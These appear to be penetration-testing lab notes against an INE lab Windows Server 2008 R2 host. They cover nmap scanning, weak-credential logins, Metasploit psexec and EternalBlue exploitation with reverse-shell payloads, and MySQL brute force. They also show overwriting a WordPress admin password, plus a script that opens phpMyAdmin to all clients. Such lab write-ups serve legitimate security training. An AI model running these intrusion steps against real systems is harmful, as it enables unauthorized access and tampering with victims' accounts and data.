Obtain the target IP address from the /etc/hosts file
cat /etc/hosts
10.2.29.246 demo.ine.local
# The target IP changes later in these notes because the lab was restarted between steps; re-check /etc/hosts after every restart
ping 10.2.29.246
ping demo.ine.local
cd Desktop
mkdir Win2k8
cd Win2k8/ # To store all the notes and files about the target
Port scanning with nmap
nmap -sV 10.2.29.246
# Default scan: the 1000 most common TCP ports, with service/version detection (-sV)
21/tcp open ftp Microsoft ftpd
22/tcp open ssh OpenSSH 7.1 (protocol 2.0)
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open mysql MySQL 5.5.20-log
4848/tcp open ssl/http Oracle Glassfish Application Server
7676/tcp open java-message-service Java Message Service 301
8080/tcp open http Sun GlassFish Open Source Edition 4.0
8181/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
9200/tcp open wap-wsp?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Perform an advanced nmap scan and export it into an xml file
nmap -T4 -PA -sC -sV -p 1-10000 10.2.29.246 -oX nmap_10k
# -T4 = Aggressive speed scan
# -PA = host discovery with TCP ACK probes
# -sC = default NSE scripts
# -sV = service version detection
# -p 1-10000 = ports range
# -oX = XML output file
# A full port-range scan (-p-) can also be done; not necessary here
# nmap -T4 -PA -sC -sV -p- 10.2.29.246 -oX nmap_all
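Once the scan is saved as XML it can be post-processed instead of re-read by eye. The script below is an added example, not part of the original notes: it pulls the open ports and service banners out of an nmap -oX report using only the Python standard library. The embedded report is a constructed, trimmed sample modelled on the services listed above; the only assumption is nmap's standard XML element layout (host, address, port, state, service).

```python
"""Extract open ports and service labels from an nmap XML report (-oX).

Added example, not from the original notes. It relies only on nmap's
standard XML element names; SAMPLE_XML below is a constructed, trimmed
stand-in for a real report.
"""
import sys
import xml.etree.ElementTree as ET

# Constructed sample modelled on the -sV output above. Port 8585 is shown
# as filtered so the open-port filter has something to drop.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX nmap_10k 10.2.29.246">
  <host>
    <status state="up"/>
    <address addr="10.2.29.246" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" product="Microsoft ftpd" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="7.1" extrainfo="protocol 2.0" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="3306">
        <state state="open" reason="syn-ack"/>
        <service name="mysql" product="MySQL" version="5.5.20-log" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="8585">
        <state state="filtered" reason="no-response"/>
        <service name="unknown" method="table" conf="3"/>
      </port>
      <port protocol="tcp" portid="9200">
        <state state="open" reason="syn-ack"/>
        <service name="wap-wsp" method="table" conf="3"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def service_label(service):
    """Build the 'name product version (extrainfo)' string nmap prints.

    nmap appends '?' when the name came from its port table rather than a
    probe response (method="table"), i.e. the service was never confirmed.
    """
    if service is None:
        return "unknown"
    name = service.get("name", "unknown")
    if service.get("method") != "probed":
        name += "?"
    parts = [name, service.get("product", ""), service.get("version", "")]
    label = " ".join(p for p in parts if p)
    extra = service.get("extrainfo")
    if extra:
        label += f" ({extra})"
    return label


def parse_nmap_xml(xml_text):
    """Return one dict per <port> element: host, port, proto, state, service."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state_el = port.find("state")
            rows.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "state": state_el.get("state") if state_el is not None else "unknown",
                "service": service_label(port.find("service")),
            })
    return rows


def open_ports(xml_text):
    """Only the ports nmap reported as open, sorted by host then port number."""
    return sorted((r for r in parse_nmap_xml(xml_text) if r["state"] == "open"),
                  key=lambda r: (r["host"], r["port"]))


if __name__ == "__main__":
    # Usage: python nmap_open_ports.py nmap_10k   (falls back to the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    for r in open_ports(text):
        print(f"{r['host']}\t{r['port']}/{r['proto']}\t{r['service']}")
```

The trailing "?" is kept on purpose: a port such as 9200 whose name was only guessed from nmap's port table (the wap-wsp? above) deserves a manual banner grab before anything is concluded about it.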
ssh vagrant@10.2.16.83
# vagrant:vagrant
# WORKS!
ssh administrator@10.2.16.83
# administrator:vagrant
# DOES NOT work!
net localgroup administrators # run on the target inside the SSH session
# "vagrant" is in the Administrators group, so these credentials also give admin-level access over SMB
Obtain a Meterpreter session
msfconsole
use auxiliary/scanner/ssh/ssh_login
setg RHOSTS 10.2.16.83
# setg stores the option globally so later modules (psexec, eternalblue) inherit it; the option is RHOSTS, RHOST is not used by this module
set USERNAME vagrant
set PASSWORD vagrant
run
sessions -i 1 # interact with the shell session the module opened
# CTRL+Z to background
sessions -u 1 # try to upgrade the shell session to Meterpreter
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
# Fallback: upload an msfvenom payload by hand, or use psexec with the admin credentials as below
msfconsole -q
use exploit/windows/smb/psexec
set RHOSTS 10.2.26.45
set SMBUser Administrator
set SMBPass vagrant
# psexec needs an account in the local Administrators group; vagrant:vagrant also qualifies (see net localgroup above)
set payload windows/x64/meterpreter/reverse_tcp
run
If no account credentials can be found, use the MS17-010 (EternalBlue) exploit, since the target is Windows Server 2008 R2
# Optional check before exploiting: the auxiliary/scanner/smb/smb_ms17_010 module reports whether the host is vulnerable
msfconsole -q
use exploit/windows/smb/ms17_010_eternalblue
options
set RHOSTS 10.2.26.45
run
MySQL
nmap -sV -sC -p 3306,8585 10.2.26.45
3306/tcp open mysql MySQL 5.5.20-log
8585/tcp open http Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
Search for MySQL exploits
searchsploit MySQL 5.5
# Only local privilege-escalation entries, nothing usable remotely, so try weak credentials instead
Brute-force MySQL
msfconsole
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 10.2.26.45
set USERNAME root
set BLANK_PASSWORDS true # try the empty password as well as the wordlist
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
run
[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Found remote MySQL version 5.5.20
[!] 10.2.26.45:3306 - No active DB -- Credential data will not be saved! # harmless; start the database with msfdb init if found credentials should be kept
[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Success: 'root:'
📌 root password is empty
mysql -u root -p -h 10.2.26.45
# press Enter at the password prompt: the password is empty
show databases;
use wordpress;
show tables;
select * from wp_users;
Change the WordPress admin user's password
❗ DO NOT change passwords in a real pentest: it locks out the legitimate user and alters client data; if a change is authorised, record the original hash first so it can be restored
UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin';
# WordPress still accepts a plain MD5 value in user_pass and re-hashes it with its own (phpass) scheme on the next successful login
Access via browser
http://10.2.26.45:8585/wordpress/wp-admin
Gain access to phpMyAdmin via MSF
Get a Meterpreter session through SMB (EternalBlue) and modify the phpMyAdmin configuration file
# In the msfconsole tab
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.2.26.45
run
sysinfo
Move into the wamp folder
cd /
cd wamp
dir
cd www\\wordpress
cat wp-config.php # holds the DB_NAME / DB_USER / DB_PASSWORD that WordPress uses
Make phpMyAdmin reachable from outside localhost (WAMP restricts it to 127.0.0.1 by default)
cd C:\\wamp\\alias
download phpmyadmin.conf # saved in the local working directory of msfconsole (Desktop here)
# In another terminal modify the file
vim /root/Desktop/phpmyadmin.conf
# Inside the <Directory> block, delete the access-control lines (Order / Deny from / Allow from 127.0.0.1) under "AllowOverride all" and insert
Allow from all
# Write and close
# Back in the Meterpreter session
upload phpmyadmin.conf
# Apache must be restarted for the change to take effect; wampapache is WAMP's Apache service, and the EternalBlue session runs as SYSTEM, so stopping it is allowed
shell
net stop wampapache
net start wampapache
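The edit above is easy to get wrong by hand (removing AllowOverride, or leaving one Deny line behind, keeps /phpmyadmin closed even after the restart). The script below is an added example, not part of the original notes: it performs exactly the rewrite described, replacing the Order/Deny/Allow lines inside each <Directory> block of a downloaded phpmyadmin.conf with a single Allow from all, and includes a check to run over the edited file before uploading it. It assumes Apache 2.2 style access directives, which matches the Apache httpd 2.2.21 seen on port 8585 (Apache 2.4 uses Require instead and is not handled); the phpmyadmin3.4.10.1 path in the constructed sample is an assumption and differs between WAMP releases.

```python
"""Rewrite the <Directory> access control in WAMP's phpmyadmin.conf so Apache
serves /phpmyadmin to any client instead of only 127.0.0.1.

Added example, not from the original notes. Assumptions: Apache 2.2 style
Order/Deny/Allow directives (Apache 2.4 uses Require instead, which this does
not handle), and an invented phpMyAdmin directory name in the sample.
"""
import re
import sys

# Constructed sample of the downloaded file; the phpmyadmin3.4.10.1 path is
# an assumption and differs between WAMP releases.
ORIGINAL_CONF = """Alias /phpmyadmin "c:/wamp/apps/phpmyadmin3.4.10.1/"

<Directory "c:/wamp/apps/phpmyadmin3.4.10.1/">
    Options Indexes FollowSymLinks MultiViews
    AllowOverride all
        Order Deny,Allow
        Deny from all
        Allow from 127.0.0.1
</Directory>
"""

# Apache 2.2 host-based access directives (mod_authz_host). AllowOverride is
# deliberately not matched: it controls .htaccess, not client access.
ACCESS_DIRECTIVE = re.compile(r"^\s*(Order|Deny from|Allow from)\b", re.IGNORECASE)


def open_to_all(conf_text):
    """Replace the access directives inside each <Directory> block with a
    single 'Allow from all', keeping every other line as it was."""
    out = []
    in_directory = False
    replaced = False
    for line in conf_text.splitlines():
        lowered = line.strip().lower()
        if lowered.startswith("<directory"):
            in_directory, replaced = True, False
        elif lowered.startswith("</directory>"):
            in_directory = False
        elif in_directory and ACCESS_DIRECTIVE.match(line):
            if not replaced:
                indent = line[: len(line) - len(line.lstrip())]
                out.append(indent + "Allow from all")
                replaced = True
            continue  # drop Order / Deny from all / Allow from 127.0.0.1
        out.append(line)
    return "\n".join(out) + "\n"


def is_open_to_all(conf_text):
    """Check: no Deny and no host-restricted Allow left inside <Directory>,
    and an 'Allow from all' actually present."""
    in_directory = False
    allow_all = False
    for line in conf_text.splitlines():
        lowered = line.strip().lower()
        if lowered.startswith("<directory"):
            in_directory = True
        elif lowered.startswith("</directory>"):
            in_directory = False
        elif in_directory:
            if lowered.startswith("deny from"):
                return False
            if lowered.startswith("allow from") and lowered != "allow from all":
                return False
            if lowered == "allow from all":
                allow_all = True
    return allow_all


if __name__ == "__main__":
    # Usage: python open_phpmyadmin.py phpmyadmin.conf > phpmyadmin.conf.new
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else ORIGINAL_CONF
    sys.stdout.write(open_to_all(text))
```

Run it on the downloaded file, confirm is_open_to_all() on the result, then upload and restart wampapache as above; the restart is still required because Apache reads this file only at start-up.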
Access phpMyAdmin
http://10.2.26.45:8585/phpmyadmin/
# It logs in automatically: phpMyAdmin is configured to use the root account, whose password is empty